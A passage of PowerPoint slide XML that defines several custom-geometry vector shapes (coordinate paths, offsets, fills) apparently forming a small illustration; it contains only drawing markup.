                    <a:pt x="594112" y="592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DDF83EB7-5F52-7CFC-FE89-B136AF6D156E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6430544" y="2125132"/>
              <a:ext cx="542290" cy="454659"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="542290" h="454660">
                  <a:moveTo>
                    <a:pt x="489271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="82783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54363" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="542124" y="367258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489271" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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1E5B54B3-C679-7527-27B5-40DCD808694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1115" y="2531526"/>
              <a:ext cx="880386" cy="237815"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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2E66E03B-56CA-52B0-6759-EFC7DD12D580}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6441848" y="2527070"/>
              <a:ext cx="592455" cy="111760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="592454" h="111760">
                  <a:moveTo>
                    <a:pt x="590439" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554" y="111255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592010" y="8910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59043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104B8BC8-A2CA-088D-B694-B21618B97DCF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524167" y="2548089"/>
              <a:ext cx="561975" cy="139065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="158559" y="124929"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114769" y="100850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93560" y="105333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49834" y="79768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="115900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64985" y="111417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108724" y="138468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158559" y="124929"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="170637" y="91808"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128358" y="66230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="81280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="102349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170637" y="91808"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="249161" y="75260"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205371" y="52679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155536" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199326" y="88798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249161" y="75260"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="327685" y="60210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="283895" y="40640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234061" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277850" y="76758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327685" y="60210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="404698" y="52679"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357886" y="27089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308051" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353364" y="63220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404698" y="52679"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="481711" y="39128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436410" y="13550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388086" y="28600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433400" y="49669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481711" y="39128"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="561975" h="139064">
                  <a:moveTo>
                    <a:pt x="561746" y="22580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514934" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465112" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510413" y="36118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561746" y="22580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94353D32-D2B4-60F6-7F59-EDBED6A90F7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6585118" y="2647338"/>
              <a:ext cx="101600" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="54061" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47537" y="40841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4689" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53588" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54061" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="48019" y="37590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47376" y="37765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="93621" y="25194"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="48019" y="37590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48584" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58214" y="37940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="98092" y="24219"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97096" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96985" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96887" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98498" y="26990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101599" y="26147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="53094" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93621" y="25194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98092" y="24219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="4792" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="7983" y="12821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4308" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9239" y="13598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="17322" y="10847"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4792" y="10847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7983" y="12821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17322" y="10847"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="41275">
                  <a:moveTo>
                    <a:pt x="59348" y="2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53094" y="2907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54934" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59841" y="3179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59348" y="290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18E7C591-48A9-4973-8F8D-C46F4643B773}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667629" y="2636887"/>
              <a:ext cx="93980" cy="38100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="38100">
                  <a:moveTo>
                    <a:pt x="48323" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42282" y="37628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="27092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48323" y="0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4A8B93B4-1B0E-CCF6-6C23-6FD918EC7CB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6663743" y="2635289"/>
              <a:ext cx="102235" cy="41275"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="52470" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="40823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4606" y="11437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52470" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="93407" y="27995"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45866" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="60844" y="37751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46668" y="37751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46994" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59826" y="37960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60844" y="37751"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97209" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="97987" y="27215"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98723" y="29980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101619" y="29386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="57300" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51423" y="2887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93407" y="27995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97209" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97987" y="27215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57300" y="2887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="4711" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="7771" y="12827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4208" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8983" y="13604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="16762" y="10867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4711" y="10867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7771" y="12827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16762" y="10867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="102234" h="41275">
                  <a:moveTo>
                    <a:pt x="51423" y="2887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51941" y="3197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52531" y="3068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51423" y="288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5D009345-E9B7-4C6D-7EAE-ED79EFA28990}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6744644" y="2623340"/>
              <a:ext cx="93980" cy="39370"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="93979" h="39369">
                  <a:moveTo>
                    <a:pt x="49833" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="13546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43792" y="39134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93625" y="25587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49833" y="0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CA1A0B62-6006-0246-BD24-4F5776457F40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6740778" y="2621721"/>
              <a:ext cx="101600" cy="42545"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="53920" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47437" y="42373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4527" y="14654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53920" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="47872" y="39133"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47255" y="39300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="93627" y="26695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47872" y="39133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48423" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58172" y="39455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97089" y="25754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96965" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="97998" y="25754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96830" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96726" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98456" y="28505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101357" y="27717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="58914" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93627" y="26695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97089" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97998" y="25754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58914" y="2918"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="4630" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4392" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="7729" y="15678"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4268" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9339" y="16618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="14390" y="13867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4630" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7729" y="15678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14390" y="13867"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="101600" h="42544">
                  <a:moveTo>
                    <a:pt x="52933" y="2918"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53485" y="3240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54101" y="3072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52933" y="2918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1237023C-605F-40B7-CB78-BCF917710AF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6821652" y="2572169"/>
              <a:ext cx="328295" cy="72390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="93624" y="61709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49834" y="36131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="51181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43789" y="72250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93624" y="61709"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="172148" y="48171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126847" y="25590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75501" y="34620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120802" y="61709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172148" y="48171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="247662" y="37630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="202349" y="12039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154025" y="21069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199339" y="48171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247662" y="37630"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="328295" h="72389">
                  <a:moveTo>
                    <a:pt x="327685" y="24079"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="280873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
